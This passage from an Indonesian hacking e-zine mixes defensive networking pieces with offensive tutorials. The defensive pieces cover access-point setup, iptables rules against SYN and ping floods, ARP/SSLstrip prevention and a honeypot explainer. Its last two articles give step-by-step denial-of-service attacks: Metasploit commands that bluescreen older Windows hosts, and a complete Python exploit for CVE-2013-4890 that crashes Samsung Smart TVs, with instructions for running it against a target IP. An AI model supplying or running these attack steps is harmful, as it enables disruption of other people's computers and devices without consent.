o Subnet mask, qt masukan 255.255.255.0

o Gateway : qr masukan 192.168.1.250, gateway tergantung settingan d

tempat teman2....

o Click Save

Page 42: E zit #vol 2

42 e-ZIT #Vol 2 - Networking

4. setelah itu click wireless lalu click basic settings, seperti dibawah ini :

o SSID : Terserah mau dinamakan apa

o Region/regional : ane masukan Indonesia..cinta negeri sendiri coy (nyari

aman :-P)

o Channel : terserah teman2 sekalian,defaultnya 6..

o Mode : defaultnya 54Mbps (802.11g), make default juga boleh

o click save lagi coy

5. selanjutnya click Mac Filtering, lalu click Enable, untuk mengaktifkan mac

filteringnya, lalu click Deny

Page 43: E zit #vol 2

43 e-ZIT #Vol 2 - Networking

6. lanjut coy, click DHCP, lalu click DHCP setting, kegunaan dari DHCP adalah agar client

mendapat IP secara otomatis, biar nggak nambah kerjaan qt untuk setting manual d

lepi/kompi client...

o click enable pada DHCP SERVER

o Start IP Address : ane masukan 192.168.1.100, tpi tergantung teman2 mau

start IP-nya mulai dari berapa

o End IP address : ane masukan 192.168.1.199

o Address Least Time dibiarin default aja

o Default Gateway : qt masukan sama dengan yg qt masukan pada point 3 tadi

yaitu 192.168.1.250

o Primary DNS : masukan primary DNS-nya

o Secondary DNS : alternatif DNS (cadangan)

o click save lagi coy

7. Selanjutnya qt ganti username and password AP : Click System Tools --> Password....

seperti dibawah ini

Page 44: E zit #vol 2

44 e-ZIT #Vol 2 - Networking

o Old user name : defaultnya admin

o Old Passwrod : defaultnya admin

o New User Name : masukan username yg baru

o New Password : Masukan Password yg baru

o Confirm New Password : masukan lagi password yg baru

o lalu click save, jgn lupa reboot AP

8. selesai AP direboot, ketik 192.168.1.111 pada address bar browser, masukan

username and password yg baru qt ganti tadi.....hihihih

9. Untuk menambahkan pengguna baru, click Wireless --> Mac Filtering --> Add

New..SS-nya d bawah ini:

Page 45: E zit #vol 2

45 e-ZIT #Vol 2 - Networking

lalu qt dihadapkan pada tampilan berikut :

o MAC ADDRESS : masukan mac address calon pengguna

o Description : namai pengguna baru, misal JIN lalu click save

yup...akhirnya selesai juga...hihihhii

Quote: settingan berbeda-beda, tergantung dari jenis AP-nya

./regards

Mavis Vermilion

Page 46: E zit #vol 2

46 e-ZIT #Vol 2 - Networking

Security > Mencegah Serangan Ping Flooding Dengan Iptables

heuheu Salam Backtrackers jumpa lagi nih ye,, ok langsung saja, sesuai judulnya kali ini Bifi mau share cara Mencegah Serangan Ping Flooding Dengan Iptables,,,, nah apa itu iptables,,, ne penjelasannya : iptables adalah suatu tools dalam sistem operasi linux yang berfungsi sebagai alat untuk melakukan filter (penyaringan) terhadap (trafic) lalulintas data. Secara sederhana digambarkan sebagai pengatur lalulintas data. Dengan iptables inilah kita akan mengatur semua lalulintas dalam komputer kita, baik yang masuk ke komputer, keluar dari komputer, ataupun traffic yang sekedar melewati komputer kita. dan ping flooding : Software ini hanya dijalankan di Windows dan menggunakan System PING dan ICMP Protocol yang memungkinkan pengiriman paket dengan cepat. Korban dari ping flood ini antara lain modem, windows, Linux, router, dan server. Semua sistem operasi dan mesin dijaringan komputer yang memiliki IP address bisa diserang tanpa terkecuali. Efek dari ping flood ini, yaitu aktifitas komputer korban yang meningkat serta traffic jaringan komputer penuh. nah udah jelas apa belum...?? ok udah ngerti kan. langsung aja yah... #Lets Rock buka editor kaka, terus ketikan kalimat-kalimat cinta di bawah ini... 1. Mencegah paket Syn Flood Attack Buat sebuah file bernama closesyn.sh atau apalah terserah kaka, yang isinya sebagai berikut untuk mencegah serangan syn flood Code: #!bin/sh

#Menghapus semua Rule

iptables -F

iptables -X

iptables -P INPUT ACCEPT

iptables -P OUTPUT ACCEPT

iptables -P FORWARD ACCEPT

#blok paket syn yang dicurigai jahat

iptables -N synjahat

iptables -A INPUT -p tcp --syn -j synjahat

iptables -A synjahat -m limit --limit 1/s --limit-burst 3 -j ACCEPT

iptables -A synjahat -j DROP

trus jalankan scriptnya, kayak gini zbyte@bt:~# sh closesyn.sh

Page 47: E zit #vol 2

47 e-ZIT #Vol 2 - Networking

2. Mencegah Ping Flood attack Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood

Code: #!bin/sh

#Menghapus semua Rule

iptables -F

iptables -X

iptables -P INPUT ACCEPT

iptables -P OUTPUT ACCEPT

iptables -P FORWARD ACCEPT

#blok paket ping(icmp) yang dicurigai jahat

iptables -N pingjahat

iptables -A INPUT -p icmp -j pingjahat

iptables -A pingjahat -m limit --limit 1/s --limit-burst 2 -j ACCEPT

iptables -A pingjahat -j DROP

jalankan scriptnya, contoh

zbyte@bt:~#sh closeping.sh

keterangan syntax iptables yang Zbyt3 pake -F (–flush) = Mengosongkan aturan pada sebuah chain -X (–delete-chain) = Menghapus rantai yang disebutkan -N (–new-chain) = Membuat rantai baru -P (–policy) = Membuat kebijakan default pada sebuah rantai -p (–protocol) = Mengecek tipe protokol tertentu. Tanda inverse(!) berarti kecuali. Misalnya protocol ! tcp berarti kecuali tcp -A (–append) = Menambah aturan pada akhir rantai sehingga akan dieksekusi terakhir -m (multiport –source-port) = Mendefinisikan port atau port range lebih dari satu -j (–jump) = Perlakuan yang diberikan terhadap paket-paket yang memenuhi kriteria. Setelah perintah ini ada beberapa opsi yaitu: ACCEPT: akan mengijinkan paket DROP: akan menolak paket REJECT: akan menolak paket nah untuk lebih jelasnya tentang iptables kunjungi : https://help.ubuntu.com/community/IptablesHowTo or http://andreslinuxer.wordpress.com/2010/...-iptables/ mungkin itu saja yang bisa Bifi share malam ini.... pegel ni tangan... sekian dan terima kasih....

./regards

Bifi

Page 48: E zit #vol 2

48 e-ZIT #Vol 2 - Networking

Security > Mencegah Serangan ARP, DNS/DHCP Spoofing & SSLstrip

Oke Langsung Saja…

1. Pencegahan ARP, DNS/DHCP Spoofing

Mengubah ARP komputer kita dari dinamyc ke static caranya :

* Untuk Windows :

masuk ke menu "Run" ketik "cmd" setelah muncul layarhitam (konsole ) ketik "getmac"

untuk melihat MACADDRES Dan "ipconfig" untuk melihat ip addres komputer anda

Misalnya: MACADDRES yang anda punya"18:f4:6a:75:3e:cd" dan Ip addres anda

192.168.88.7. langakah selanjutnya Mengubah ARP Anda menjadi static..

Perintahnya : "arp -s [Ip_Addres ] [MAC_Anda]"

Jadi seperti ini: "Arp -s 192.168.88.7 18:f4:6a:75:3e:cd"

* Untuk Linux :

Buka konsole (terminal) ketik "macchanger -s wlan0" untuk menampilkan MACADDRES

yang anda miliki,ingat..!! "sesuaikan device wireless yang anda gunakan" kalau saya "wlan0"

Misalnya :MACADDRES anda "07:f4:6a:71:3e:ce" . Langkah selanjutnya Mengubah ARP anda

Menjadi Static

Perintahnya:"arp -i wlan0 -s 192.168.88.7 07:f4:6a:75:3e:ce"

2. Pencegahan SSLstrip

Serangan MITM dengan sslstrip ini dilakukan dengan memanfaatkan kemalasan pengguna

untuk langsung menggunakan https. Pengguna yang malas memilih untuk menggunakan

http biasa dan berharap di-redirect ke url https otomatis atau menemukan link ke url https.

Padahal pada saat pengguna menggunakan http biasa itulah pengguna berpotensi terkena

serangan mitm. Bila pengguna langsung menggunakan https, maka pengguna akan aman

dan terbebas dari serangan mitm. Jadi mulai sekarang biasakanlah mengetikkan https:// di

URL anda bila ingin mengakses situs yang sensitif. misalnya twitterl,ymail,facebook,paypal

dll

Page 49: E zit #vol 2

49 e-ZIT #Vol 2 - Networking

Melakukan Ping terhadap website yang anda ingin kunjungi

contoh :

root@assock:~#ping http://www.twitter.com

PING 10.0.18.76 (10.0.18.76) 56(84) bytes of data.

64 bytes from 10.0.18.76: icmp_seq=1 ttl=64 time=0.063 ms

64 bytes from 10.0.18.76: icmp_seq=2 ttl=64 time=0.051 ms

64 bytes from 10.0.18.76: icmp_seq=3 ttl=64 time=0.050 ms

64 bytes from 10.0.18.76: icmp_seq=4 ttl=64 time=0.047 ms

64 bytes from 10.0.18.76: icmp_seq=5 ttl=64 time=0.053 ms

64 bytes from 10.0.18.76: icmp_seq=6 ttl=64 time=0.050 ms

hasil ping di atas menunjukan bahwa DNS anda telah di alihkan ke Ip 10.0.18.76 yang bukan Real addres Facebook

ok mungkin bisa membantu agar teman-2 tidak menjadi korban...!!!

./regards

shockw4f3

Page 50: E zit #vol 2

50 e-ZIT #Vol 2 - Networking

Security > Apa Itu Honeypot ?

Honeypot ? apa itu ? apa fungsinya ? kenapa tiba-tiba nongol di e-ZIT ?

Yosh, e-ZIT menulis Thread ini berdasarkan request dari teman-teman ZIT Divisi Networking,

nah berikut ini sedikit penjelasan mengenai “Apa Itu Honeypot”

Sejarah

Ada beberapa definisi honeypot yang disampaikan oleh beberapa peneliti honeypot pada

makalah sistem kemanan yang mereka buat maupun dari halaman web. Menurut Lance

Spitzner, seorang arsitek sistem keamanan Sun Microsystems, ”A honeypot is security

resource whose value lies in being probed, attacked, or compromised.” Definisi ini menjadi

acuan beberapa makalah lainnya. Dari definisi itu dapat diambil kesimpulan bahwa

honeypot baru dikatakan suatu sistem keamanan jika honeypot tersebut disusupi, diserang,

atau dikendalikan oleh penyerang. Ada juga seorang insinyur berkebangsaan Swiss bernama

Reto Baumann menyikapi interpretasi yang diberikan oleh Lance Spitzner. Menurut

Baumann melalui tugas akhir diplomanya, ” A honeypot is a resource which pretends to be a

real target. A honeypot is expected to be attacked or compromised. The main goals are the

distraction of an attacker and the gain of information about an attack and the attacker.Jadi

menurut Baumann, honeypot adalah sebuah sumber daya sistem keamanan yang dibuat

sebagai tujuan utama penyerang yang sebenarnya merupakan sistem yang palsu untuk

menjebak penyerang. Sistem honeypot biasanya hanya sebuah sistem yang dihubungkan

dengan jaringan produktif, atau sistem yang asli, yang ada dengan tujuan untuk menjebak

penyerang.

Konsep serupa honeypot (sebelumnya belum diberi istilah seperti itu) dipercaya sudah

cukup lama ada, walaupun tidak ada literatur yang membahasnya sebelum tahun 1990.

Tahun 1990 Clifford Stoll menerbitkan buku The Cuckoo’s Egg, yang lebih mirip

cerita detektif. Penerbitnya Pocket Books, yang lebih dikenal dengan novel. Inilah

penerbitan pertama yang menguraikan konsep honeypot. Buku ini menceritakan kejadian

sesungguhnya selama periode sepuluh bulan di tahun 1986-1987. Stoll adalah astronom

pada Lawrence Berkeley Lab yang menjadi admin berbagai komputer untuk komunitas

astronom. Selisih akuntansi senilai 75 sen membuatnya menyadari akan adanya hacker

bernama Hunter, yang telah menyusup ke dalam sistem.

Bukannya menutup account penyusup ini, Stoll malah membiarkannya berada dalam sistem,

agar dapat mempelajarinya lebih jauh dan memburunya. Tanpa disadari penyerang, Stoll

menyiapkan direktori SDINET (Strategic Defence Initiave Network) dan mengisinya dengan

file-file yang pura-pura berisi berbagai file keuangan dan rahasia negara. Hacker ini ternyata

tidak tertarik pada file-file keuangan. Makalah teknis pertama mengenai honeypot terbit

Page 51: E zit #vol 2

51 e-ZIT #Vol 2 - Networking

pada tahun 1990 itu juga, tulisan Bill Cheswick berjudul ‘An Eve-ning with Berfeld in Which a

Cracker Is Lured, Endured and Studied’ . Berbeda dengan yang pertama, Cheswick memang

menyiapkan suatu sistem yang memang untuk diserang, menjadikannya kasus pertama dari

honeypot yang sesungguhnya. Pada makalah ini Cheswick bukan saja membahas cara

membangun dan menggunakan honeypot, melainkan juga menceritakan bagaimana

seorang hacker Belanda dipelajari sewaktu dia menyerang dan menguasai sistem. Cheswick

pertama-tama membangun suatu sistem dengan beberapa kelemahan (termasuk Sendmail)

untuk mendapatkan ancaman apa saja yang ada dan bagaimana cara kerjanya. Tujuannya

bukanlah untuk menangkap orang tertentu, melainkan untuk mempelajari kegiatan

membahayakan apa saja yang bisa terjadi terhadap network dan sistemnya. Cheswick

menciptakan suatu lingkungan terkontrol yang disebutnya sebagai jail (ia tidak

menyebutnya sebagai honeypot), yang mengurung kegiatan sang penyerang. Hacker

Belanda dengan nickname Berfeld ini memasuki sistem dengan memanfaatkan kelemahan

pada Sendmail sampai mendapatkan kendali terhadap sistem. Secara umum, honeypot

dapat didefinisikan sebagai sebuah sumber daya sistem informasi dimana nilai guna dari

sumber daya tersebut justru berdasar kepada terdeteksinya kasus penggunaan yang tidak

terotorisasi atau tidak diperbolehkan secara hukum dari sumber daya tersebut. Atau dengan

kata lain, honeypot adalah sebuah sumber daya yang bersifat seakan-akan target yang

sebenarnya, yang dengan sengaja disediakan untuk diserang atau diambil alih. Oleh karena

itu, honeypot akan diamati, diserang bahkan dieksploitasi oleh penyerang atau penyusup.

Tujuan utama dari honeypot ini adalah untuk mengumpulkan informasi dari suatu serangan

dan penyerang yang melakukannya. Intruder atau penyerang merupakan istilah umum yang

diberikan untuk menggambarkan seseorang yang berusaha untuk masuk ke dalam sistem

dalam arti berusaha menggunakan sistem dimana mereka tidak memiliki autorisasi atau

menggunakan sistem untuk maksud yang menyimpang di luar hak-hak yang mereka miliki.

Tipe Honeypot

Honeypot dibagi menjadi dua tipe dasar, yaitu production honeypot dan research honeypot.

Tujuan utama dari production honeypot adalah untuk membantu mengurangi resiko

keamanan jaringan pada sebuah organisasi. Production honeypot memberikan suatu nilai

tambah bagi keamanan jaringan dari suatu organisasi. Tipe kedua, research honeypot,

adalah honeypot yang didesain untuk mendapatkan informasi mengenai aktivitas-aktivitas

dari komunitas penyerang atau penyusup. Research honeypot tidak memberikan suatu nilai

tambah secara langsung kepada suatu organisasi, melainkan digunakan sebagai alat untuk

meneliti ancaman-ancaman keamanan yang mungkin dihadapi dan bagaimana cara untuk

melindungi diri dari ancaman tersebut.

Page 52: E zit #vol 2

52 e-ZIT #Vol 2 - Networking

Klasifikasi Honeypot

Honeypot dapat diklasifikasikan berdasarkan pada tingkat interaksi yang dimilikinya. Tingkat

interaksi dapat didefinisikan sebagai tingkat aktivitas penyerang atau intruder di dalam

sistem yang diperbolehkan maka semakin tinggi pula tingkat interaksi honeypot.

LOW INTERACTION HONEYPOT

Low-interaction honeypot merupakan honeypot dengan tingkat interaksi honeypot, yaitu

honeypot yang didesain untuk mengemulasikan service (layanan) seperti pada server yang

asli. Penyerang hanya mampu memeriksa dan terkoneksi ke satu atau beberapa port.

Kelebihan low-interaction honeypot yaitu:

Mudah di install, dikonfigurasi, deployed, dan dimaintain

Mampu mengemulasi suatu layanan seperti http, ftp, telnet, dsb.

Difungsikan untuk deteksi serangan, khususnya pada proses scanning atau

percobaanpembukaan koneksi pada suatu layanan.

Kekurangan low-interaction honeypot :

Layanan yang di berikan hanya berupa emulasi, sehingga penyerang tidak dapat

berinteraksi secara penuh dengan layanan yang diberikan atau sistem operasinya

secara langsung

Informasi yang bisa kita dapatkan dari penyerang sangat minim.

Apabila serangan dilakukan oleh “real person” bukan “automated tools” mungkin

akan segera menyadari bahwa yang sedang dihadapi merupakan mesin honeypot,

karena keterbatasan layanan yang bisa diakses.

MEDIUM INTERACTION HONEYPOT

Kelebihannya Medium Interaction Honeypot:

Memiliki kemampuan yang lebih banyak untuk berinteraksi dengan penyerang

dibandingkan low-interaction honeypot namun tidak sebanyak high-interaction

honeypot.

Emulasi layanan dapat ditambahkan berbagai macam fitur tambahan sehingga

seakanakan penyerang benar-benar sedang berinteraksi dengan layanan yang

sebenarnya.

Contoh: script untuk mengemulasikan IIS web server dengan berbagai macam

informasi tambahan yang menyertai web server tersebut sehingga benar-benar

terlihat seperti aslinya, atau pun juga membuat emulasi IIS yang dapat berinteraksi

Page 53: E zit #vol 2

53 e-ZIT #Vol 2 - Networking

dengan suatu jenis worm, sehingga kita bisa mendapatkan payload dari worm

tersebut untuk dianalisis selanjutnya.

Contoh: menggunakan jail atau chroot, yaitu membangun sistem operasi virtual pada

partisi yang terpisah didalam sistem operasi yang sebenarnya dimana sistem operasi

virtual tersebut sepenuhnya di kontrol oleh sistem operasi yang sebenarnya, cara ini

dapat memberikan suasana sistem operasi yang sesungguhnya bagi penyerang.

Kekurangan Medium Interaction Honeypot :

Sistem tersebut cukup kompleks.

Memerlukan usaha lebih untuk maintain dan deploy sistem tersebut sehingga akses

yang diberikan kepada penyerang benar-benar terjamin tingkat keamanannya

namun tetap dapat memberikan suasana sistem yang nyata bagi penyerang sehingga

penyerang tersebut tidak curiga bahwa aktivitasnya sedang di monitor.

HIGH INTERACTION HONEYPOT

Pada high-interaction honeypot terdapat sistem operasi dimana penyerang dapat

berinteraksi langsung dan tidak ada batasan yang membatasi interaksi tersebut.

Menghilangkan batasan-batasan tersebut menyebabkan tingkat risiko yang dihadapi

semakin tinggi karena penyerang dapat memiliki akses root. Pada saat yang sama,

kemungkinan pengumpulan informasi semakin meningkat dikarenakan kemungkinan

serangan yang tinggi. Dikarenakan penyerang dapat berinteraksi secara penuh dengan

sistem operasi, maka apabila si penyerang telah mendapat akses root.

Kelebihannya :

Penyerang berinteraksi langsung dengan sistem yang nyata termasuk diantaranya

sistem operasi, network, hingga layanan yang diberikan ( web, ssh service, mail

service, dll )

Umumnya dibangun suatu sistem khusus dengan topologi yang telah dipersiapkan.

Sistem tersebut biasanya terdiri dari berbagai macam implementasi dari teknologi

keamanan yang banyak digunakan untuk melindungi suatu sistem, seperti firewall,

IDS/IPS, router, dll.

Target serangan berupa sistem operasi sebenarnya yang siap untuk berinteraksi

secara langsung dengan penyerang.

Kekurangannya :

Perencanaan dan implementasi sistem jauh lebih rumit dan dibutuhkan banyak

pertimbangan.

Page 54: E zit #vol 2

54 e-ZIT #Vol 2 - Networking

High-interaction honeypot bersifat tidak efisien karena membutuhkan pengawasan

berkala.

Apabila telah diambil alih oleh penyerang maka honeypot tersebut dapat menjadi

ancaman bagi jaringan yang ada.

SEJARAH WIRELESS HONEYPOT

Kemajuan teknologi honeypot mulai terlihat ketika Kevin Poulsen pada tahun 2002

mempublikasikan penelitiannya, Wi-Fi Honeypots a New Hacker Trap , penelitian Poulsen ini

dianggap beberapa pihak sebagai teknologi wireless honeypot yang pertama. Suatu tim

peneliti, WISE ( Wireless Information Security Experiment ) pada tahun 2002 didirikan oleh

SAIC ( Science Applications International Corporation ) di Washington DC, Amerika Serikat.

Tim peneliti ini meneliti celah keamanan jaringan wireless pada waktu itu, tim tersebut

mendapati bahwa kebanyakan jaringan wireless pada saat itu sangat mudah untuk disusupi

dan sangat terbuka. Jenis ancaman yang ditemukan adalah akses yang tidak terotorisasi,

penggunaan jaringan wireless yang ilegal, mendengarkan proses komunikasi pada wireless

secara ilegal ( eavesdropping ). Ancaman kemanan tersebut merupakan ancaman keamanan

yang paling utama dan paling sering terjadi saat ini. Pada akhir 2002, sebuah organisasi

bernama Tenebris mempublikasikan hasil penelitian mereka, yaitu pengumpulan data dari

wireless honeypot yang mereka implementasikan di Ottawa ( Canada ) dan menyimpulkan

bahwa sangat banyak terjadi aktivitas war driving saat itu dan apa saja yang sering menjadi

target serangan para penyerang di jaringan wireless. Selanjutnya, Tenebris melanjutkan riset

mereka di sekitar kota London lalu menuju Adelaide, South Australia.

SKENARIO SERANGAN PADA JARINGAN WIRELESS

Dari beberapa penelitian sebelumnya, ada suatu bentuk pola skenario serangan yang umum

terjadi pada sistem keamanan wireless. Setidaknya ada tiga pola skenario serangan, yaitu:

Serangan yang sebenarnya ditujukan ke jaringan kabel ( LAN ) dengan memakai

jaringan wireless sebagai media untuk menyusup ke LAN.

Serangan yang langsung ditujukan kepada pengguna jaringan wireless. Jenis

serangan ini menyerang perangkat wireless user.

Serangan yang ditujukan ke infrastruktur jaringan wireless secara keseluruhan. Jenis

serangan ini biasanya bertujuan mengambil alih akses penuh jaringan wireless.

ARSITEKTUR WIRELESS HONEYPOT

Secara umum arsitektur wireless honeypot yang akan diimplementasikan adalah sebagai

berikut.

Wireless Access Point ( WAP ) sebagai media prasarana jaringan wireless.

Page 55: E zit #vol 2

55 e-ZIT #Vol 2 - Networking

Wireless Client ( WC ) merupakan pihak pengguna jaringan wireless ( user ).

Wireless Monitor ( WMON ) sebagai perangkat yang merekam trafik jaringan.

Wireless Data Analysis ( WDA ) berfungsi menganalisis trafik dari WMON

Wired Instructure ( WI ) merupakan infrastruktur LAN.

Saya informasikan kepada pembaca, jika anda membeli perangkat telekomunikasi,

sebaiknya yang sudah di sertifikasi atau yang sudah bersertifikat resmi dari postel, untuk

menjaga agar anda tidak berurusan dengan pihak yang berwajib. Dan perangkat yang sudah

di sertifikasi tentunya sudah lulus pengujian di balai uji, sehingga mutu dan kualitasnya

terjamin.

Penempatan Honeypot

Eksternal Placement, honeypot diposisikan berhadapan langsung dengan internet,

jadi tidak ada firewall di depan honeypot.

Internal Placement, honeypot tidak terkoneksi langsung ke internet tetapi berada di

antara firewall dan koneksi internet.

Page 56: E zit #vol 2

56 e-ZIT #Vol 2 - Networking

DMZ Placement, honeypot diposisikan dalam firewall DMZ (demilitarized zone).

Biasanya digunakan pada sebuah perusahaan besar dengan sistem jaringan yang

besar.

Sumber :

Seminar Security Jaringan (khususnya pembicaranya, lupa namanya, tapi

senyumnya… MANTAB )

NeoTek Vol. V – No. 1

Referensi > http://bisnistypeapproval.wordpress.com/2009/05/01/jaringan-honeypot/

Yarp, gemana ? udah pada tau “Apa Itu Honeypot” kan, tertarik untuk mencobanya atau menerapkannya ?

Kalo udah di coba jangan lupa di share yah…..

Special Thank.z To > Keygen, Surtua, Gunners, Thektor, Rulex, Error and All Crew ZIT Networking Division

./regards

e-ZIT

Page 57: E zit #vol 2

57 e-ZIT #Vol 2 - Networking

Network Attack > DoS Attack With Metasploit

Hai-Hai . . .

Salam Bcktrackers Jumpa lagi sama saya Bifi yang Cool . . . wkwkw

Yups, kali Bifi mau share neh, sesuai kayak judul di atas, DOS With Metasploit, buat yang

biasa jadi penjahat di komputer pasti udah tau kan apa itu metasploit...

ok neh penjelasannya

DoS (Denial of Service) > adalah jenis serangan terhadap sebuah komputer atau server di

dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh

komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan

benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses

layanan dari komputer yang diserang Țersebut..

Metasploit > Metasploit merupakan sofware security yang sering digunakan untuk menguji

coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu

sistem...

sekian thread saya, makasih,,, wkwkwkw eh belum belum,,,

lanjoot,,

Okok,, Sebelum Melakukan Aksi Kali Ini, Mending Kita Liad Persyaratannya Dolo... neh,

DoS hanya bisa dilakukan ke Seri Windows yang tertera dibawah.

Windows 7 dan Vista dan Windows 8 belum/tidak bisa.

Code :

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows XP Tablet PC Edition SP1

Microsoft Windows XP Tablet PC Edition

Microsoft Windows XP Professional x64 Edition

Microsoft Windows XP Profesional SP2

Microsoft Windows XP Professional SP1

Microsoft Windows XP Professional

Microsoft Windows XP Media Center Edition SP2

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows XP Media Center Edition

Microsoft Windows XP Home SP2

Microsoft Windows XP Home SP1

Microsoft Windows XP Home

Microsoft Windows XP Emas 0

Microsoft Windows XP Embedded SP1

Microsoft Windows XP Embedded

Microsoft Windows XP 64-bit Edition Versi 2003 SP1

Page 58: E zit #vol 2

58 e-ZIT #Vol 2 - Networking

Microsoft Windows XP 64-bit Edition 2003 Versi

Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows XP 64-bit

Microsoft Windows XP 0

Microsoft Windows Server 2003 Web Edition SP1 Beta 1

Microsoft Windows Server 2003 Web Edition SP1

Microsoft Windows Server 2003 Web Edition

Microsoft Windows Server 2003 Standard x64 Edition

Microsoft Windows Server 2003 Standard Edition SP1 Beta 1

Microsoft Windows Server 2003 Standard Edition SP1

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1 Itanium

Microsoft Windows Server 2003 Enterprise Edition SP1 Itanium

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1

Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows Server 2003 Datacenter x64 Edition

Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1 Itanium

Microsoft Windows Server 2003 Datacenter Edition SP1 Itanium

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1

Microsoft Windows Server 2003 Datacenter Edition SP1

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Server SP4

Microsoft Windows 2000 SP4 Professional

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows 2000 Advanced Server SP4

siapkan alat dan bahan...

1. Sebuah PC/Laptop Yang Udah Terkoneksi

2. Nmap Untuk Scan Traget

3. Metasploit

4. Korban

Nb > Ini Hanya bisa di lakukan pada 1 jaringan yang sama . . . alias ngana baconnect di situ,

korban juga di situ kabawa...

step 1...

scan target with nmap doloo,

Scan dengan nmap, untuk cari tau OS Korban n cari yang port 445 yang terbuka...

kayak gini

Page 59: E zit #vol 2

59 e-ZIT #Vol 2 - Networking

commandnya ada disini,

http://forum.codernate.org/thread-331.html

silahkan di coba..

Ingat, OSnya Harus Cocok Kayak Daftar Yang Di Atas...

klo udah dapet ip korbannya, langsung aja deh buka tools metasploitnya,,

ne letak toolsnya

klik ikon backtrack lalu pilih,

backtrack > explotation > network explotation tools > metasploit framework > klik

msfconsole

setelah di consolenya ketik perintah berikut

Code: - msf > use dos/windows/smb/ms06_063_trans

- msf auxiliary(ms06_063_trans) > set LPORT 445 # setting port ke 445

- msf auxiliary(ms06_063_trans) > set RHOST IP_TARGET # ip address target

bro

- msf auxiliary(ms06_063_trans) > run

Page 60: E zit #vol 2

60 e-ZIT #Vol 2 - Networking

kayak gini

kalo udah maka hasilnya akan seperti ini, kebetulan temen Bifi setelah di bujuk dengan Big

Cola 1 botol dia mau jadi korbannya,,

kasian...

Page 61: E zit #vol 2

61 e-ZIT #Vol 2 - Networking

neh hasilnya, langsung di capture . . .

Yap, target langsung mengalami bluescreen :)

nah gitu aja...

ne thread Bifi specialin buat temen Bifi yang gak mau disebut namanya, thank.z zob udah

mau laptopnya dijadiin korban,,,

n buat yang make OS untuk Hacking or Hoby ngumpul tools hacking, di pake toolsnya bukan

di jadiin hiasan . . .

Terakhir Jangan Males googling Yah...

referensi > forum.id-backtrack.com

./regards

Bifi

Page 62: E zit #vol 2

62 e-ZIT #Vol 2 - Networking

Network Attack > POC Samsung Smart TV Denial of Service (DoS) Attack

Yups, setelah beberapa bulan miskin thread, akhirnya dapat juga,,,

berawal dari searching-searching di mbah gugel, eh nemu juga...

wkwkw, seperti judul di atas, kali ini bifi mau kasih tau POCnya,

Step 1...

Copas script python dibawah ini...

Code: #!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack

# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com

# Date: 07/21/2013

# CVE Number: CVE-2013-4890

# Vendor Homepage: http://www.samsung.com

# Description:

# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a

long HTTP GET request

# As a results, the TV reboots...

# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest

firmware :)

import httplib

import sys

import os

print

" ************************************************************************

***************"

print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"

print " Exploit: Denial of Service (DoS) attack\n"

print " Description:\n"

print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by

sending a long request."

print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n"

print

" ************************************************************************

***************\n"

# Sends the payload

print " Sending the malicious payload...\n"

conn = httplib.HTTPConnection(sys.argv[1],5600)

conn.request("GET", "A"*300)

conn.close()

# Checks the response

print " Checking the status... (CTRL+Z to stop)\n"

response = 0

while response == 0:

response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")

if response != 0:

print " Target down!\n"

Page 63: E zit #vol 2

63 e-ZIT #Vol 2 - Networking

Atau ambil saja disini http://www.exploit-db.com/exploits/27043/

save dengan extensi .py .. terserah namanya apa, bifi.py kek, gula.py kek,,, whatever you

want bro....

jangan lupa beri file permissionnya dulu

ketik chmod +x namafile.py + enter

contoh :

root@bifi:~# chmod +x gula-gula.py

#Step 2

Usahakan kita berada dalam 1 jaringan yang sama,, dalam hal ini masih via LAN untuk versi

WiFi bifi masih belum paham a.k.a masih di cari POC nya,,,,

yarp kalo udah scan dulu IP Target bisa make NMAP or apalah,,,,

setelah target di dapat,,, misalkan IP targetnya 200.100.1.22, nah tinggal jalankan

scriptnya....

#Step 3

untuk jalankan scriptnya, cukup open terminal masuk ke directory script.py yang tadi kita

udah simpan, lalu ketik ./namascript.py IP_TARGET

contoh :

root@bifi:~# ./gula-gula.py 200.100.1.22 + enter

daaaan, tango down,, check dengan ping IP Target, jika uncreable/timeout berarti target

down,,,,,

Nah mengapa target down,,,???

itu terjadi karena port TCP/5600 pada Samsung Smart TV tersebut mengalami crash, karena

script tersebut mengirim "HTTP GET request" yang panjang atau sangat banyak.. sehingga

TV dipaksa untuk restart a.k.a reboot... neh fungsi yang membuat port tersebut crash

Code: conn = httplib.HTTPConnection(sys.argv[1],5600)

yups mungkin itulah sedikit POC dari cara DoS Samsung TV,,,, Script ini masih work di segala

jenis SAMSUNG SMART TV.....

Tested On : Samsung plasms TV PS50C7700.

Page 64: E zit #vol 2

64 e-ZIT #Vol 2 - Networking

nah next thread nanti Bifi akan jelaskan POC untuk mendapatkan full access remote pada

SAMSUNG SMART TV, hingga kita bisa memantau semua aktivitas pemilik TV tersebut alias

"we keep the eyes and ears in the living room"

TO BE CONTINUED

Referensi

http://www.exploit-db.com/exploits/27043/

http://www.infosecurity.com

http://securityaffairs.co

http://www.youtube.com/watch?v=U-R2epNnU...r_embedded

Special Thanks To

